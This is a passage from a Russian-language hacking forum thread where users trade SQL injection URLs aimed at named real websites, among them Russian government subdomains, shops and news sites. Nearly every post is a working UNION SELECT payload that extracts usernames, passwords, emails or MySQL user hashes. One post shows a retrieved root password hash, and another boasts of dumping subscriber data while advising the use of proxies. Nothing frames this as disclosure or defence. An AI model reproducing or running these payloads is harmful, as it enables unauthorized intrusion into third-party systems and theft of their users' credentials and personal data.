ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1591  
Старый 03.04.2007, 16:56
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

Код:
http://www.sport.com.ua/vote.phtml?id=-180+union+select+concat(username,char(58),password),2+from+users/*
 
Ответить с цитированием

  #1592  
Старый 03.04.2007, 17:10
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от VampiRUS  
жалко только до данных моделей чёт не смог добраться
Код:
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,8+from+mo dels/*
расшивровываем и ищем админку
Код:
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(username,char(58),password)+from+admin/*
ну на кройняк можно и на форум напасть
Код:
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(username,char(58),user_password)+from+phpbb_users+limit+4,1/*
 
Ответить с цитированием

  #1593  
Старый 03.04.2007, 17:19
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(user(),char(58),version()),5,6,7,8/*
http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(login,char(58),password),5,6,7,8+from+user+limit+0,1/*
Код:
http://www.komus-opt.ru/news.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3/*
 
Ответить с цитированием

  #1594  
Старый 03.04.2007, 17:31
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

shop
Код:
http://www.berneboek.com/shop/product.php?id=-2691+union+select+1,password,3,4+from+users/*
 
Ответить с цитированием

  #1595  
Старый 03.04.2007, 18:34
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.daymusic.ru/announce.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
доступ к мускл.юзер был, потом исчез о_0
 
Ответить с цитированием

  #1596  
Старый 03.04.2007, 18:56
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

mnr.gov.ru Вытянул мыло подписчиков, логин, пароль, мыло пользователей.

Код:
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4/*
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(user,char(58),password),3,4+from+mysql.user+limit+0,1/*
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,email,3,4+from+subscribe+limit+0,1/*
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(login,char(58),password,char(58),email),3,4+from+users+limit+0,1/*
Не забываем юзать прокси!

Код:
http://www.kharkov-sport.com/news.phtml?id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11/*

Последний раз редактировалось Grey; 03.04.2007 в 19:51..
 
Ответить с цитированием

  #1597  
Старый 03.04.2007, 20:22
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от Grey  
mnr.gov.ru

Код:
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(database(),char(58),user/*
Бгга =)

http://les.mnr.gov.ru

Код:
http://les.mnr.gov.ru/part/?act=more&id=1432&pid=-1+union+select+concat(login,char(58),password),2+from+users/*
http://voda.mnr.gov.ru

Код:
http://voda.mnr.gov.ru/part/?pid=-1+union+select+1,concat(login,char(58),password),3,4+from+users/*
 
Ответить с цитированием

  #1598  
Старый 03.04.2007, 21:12
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Какие то там пилоты. http://www.calpilots.org/
Цитата:
http://www.calpilots.org/html/article.php?sid=1722'
11 column, table: mysql.user
Цитата:
http://www.calpilots.org/html/article.php?sid=-1722+union+select+1,2,3,4,5,6,7,8,9,10,11+from+mys ql.user
user,password
Цитата:
http://www.calpilots.org/html/article.php?sid=-1722+union+select+1,2,3,4,5,concat(user,0x3a,passw ord),7,8,9,10,11+from+mysql.user
root:161de26c23c0854e
__________________
..
 
Ответить с цитированием

  #1599  
Старый 03.04.2007, 21:46
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Седня слабенько(( Турагентсво.

Цитата:
http://www.kakady.ru/index.php?akus=1&id=11111+union+select+1,2,3,4,5/*
И аватарки (выводится только двойка, между банерами)

Цитата:
http://www.avatary.ru/avatar.php?w=100&a=0&pid=940+union+select+1,2,3,4, 5,6,7,8,9,10,11

Последний раз редактировалось Fr-Ron; 03.04.2007 в 22:43..
 
Ответить с цитированием

  #1600  
Старый 03.04.2007, 21:53
ssk.ex0.uf0
Познающий
Регистрация: 27.02.2007
Сообщений: 89
Провел на форуме:
1141192

Репутация: 195
Отправить сообщение для ssk.ex0.uf0 с помощью ICQ
По умолчанию

Мимо надписи "France opens secret UFO files covering 50 years" несмог равнодушной пройти =)
Код:
http://www.breitbart.com/article.php?id=1'+union+select+1,2,DATABASE(),4,5,6,USER(),8,9,10,11,12/*
А вот если на запрос:
Код:
http://www.breitbart.com/article.php?id=1'+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+mysql.user/*
Отвечает "Access denied" всё вилы?(

Последний раз редактировалось ssk.ex0.uf0; 03.04.2007 в 22:13..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ